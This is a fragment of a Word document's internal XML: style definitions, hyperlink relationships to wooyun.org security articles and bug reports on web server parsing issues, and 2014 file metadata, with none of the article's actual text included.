    <w:rsid w:val="00FF43F9"/>
    <w:rsid w:val="00FF4A84"/>
    <w:rsid w:val="00FF4BBA"/>
    <w:rsid w:val="00FF7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369"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="40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D633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D63369"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6336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D63369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633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3369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D63369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D63369"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D63369"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="No Spacing"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00D63369"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="无间隔 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00D63369"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D63369"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F1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F14FA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F14F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F14FA"/>
    <w:rPr>
      <w:kern w:val="2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F14FA"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fav-num">
    <w:name w:val="fav-num"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001F14FA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001F14FA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="author">
    <w:name w:val="author"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001F14FA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cat-links">
    <w:name w:val="cat-links"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001F14FA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comments-link">
    <w:name w:val="comments-link"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001F14FA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F14F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HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F1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1F14FA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14FA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1F14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1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10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900">
          <w:marLeft w:val="75"/>
          <w:marRight w:val="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ops.wooyun.org/author/erevus" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/bugs/wooyun-2013-02106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://www.wooyun.org/bugs/wooyun-2013-03225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wooyun.org/searchbug.php?q=apache%E8%A7%A3%E6%9E%90" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://drops.wooyun.org/papers/539" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/searchbug.php?q=IIS6.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wooyun.org/searchbug.php?q=%2500.php" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://drops.wooyun.org/papers/53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rops.wooyun.org/category/papers" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/bugs/wooyun-2013-0192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2036</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>DEF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2014-04-14T16:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-04-14T16:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>